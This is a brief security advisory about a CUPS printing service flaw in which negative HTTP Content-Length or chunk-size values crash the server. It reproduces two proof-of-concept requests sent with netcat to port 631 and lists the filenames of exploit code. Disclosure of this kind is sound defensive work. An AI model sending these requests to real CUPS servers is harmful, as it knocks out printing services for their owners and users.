CUPS Negative Length HTTP Header Vulnerability

CUPS Negative Length HTTP Header Vulnerability

The following proof of concepts were provided by iDefense:
$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1

$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Transfer-Encoding: chunked

- - - - -FFFFFFFE

Gabriel A. Maggiotti <gmaggiot@ciudad.com.ar> has developed proof of concept code that will exploit this vulnerability to crash target servers.

/data/vulnerabilities/exploits/shutdown_Cups.c
/data/vulnerabilities/exploits/sigcups.c